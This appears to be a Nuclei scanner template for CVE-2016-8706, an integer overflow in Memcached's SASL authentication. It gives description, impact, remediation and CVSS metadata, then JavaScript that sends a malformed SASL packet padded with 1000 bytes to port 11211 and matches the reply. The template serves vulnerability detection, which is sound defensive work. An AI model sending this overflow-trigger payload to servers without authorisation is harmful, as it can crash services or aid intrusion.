id: CVE-2016-8706 info: name: Memcached Server SASL Authentication - Remote Code Execution author: pussycat0x severity: high description: | An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution. impact: | Attackers can trigger heap overflow in the SASL authentication function, potentially achieving remote code execution on Memcached servers. remediation: | Upgrade Memcached to a version later than affected releases that properly handles integer overflow in SASL authentication. reference: - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py - https://nvd.nist.gov/vuln/detail/CVE-2016-8706 - http://rhn.redhat.com/errata/RHSA-2016-2819.html - http://www.debian.org/security/2016/dsa-3704 - http://www.securitytracker.com/id/1037333 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2016-8706 cwe-id: CWE-190 epss-score: 0.51793 epss-percentile: 0.97952 cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: memcached product: memcached verfied: true tags: cve,cve2016,rce,js,memcached,vuln javascript: - pre-condition: | isPortOpen(Host,Port); code: | let packet = bytes.NewBuffer(); packet.Write(new Uint8Array([0x80, 0x21])) let cmd = 'stats' packet.WriteString(cmd) packet.Pack("!H", [32]); packet.Pack("!I", [1]); let buzz = Array(1000).fill("A").join(''); packet.WriteString(buzz) const c = require("nuclei/net"); let conn = c.Open('tcp', `${Host}:${Port}`); conn.SendHex(packet.Hex()); conn.RecvString(); args: Host: "{{Host}}" Port: 11211 matchers-condition: and matchers: - type: word words: - "Invalid arguments" - type: word words: - "Auth failure" negative: true # digest: 4a0a00473045022100cfc14488925c69b136a8e72f0d01e9c3f96243666abc3757ed6fb29c414fe3f50220434c5a9387f01bb7011ca1782eaa9f9cfb48e67979371b005012bb356ff6a963:922c64590222798bb761d5b6d8e72950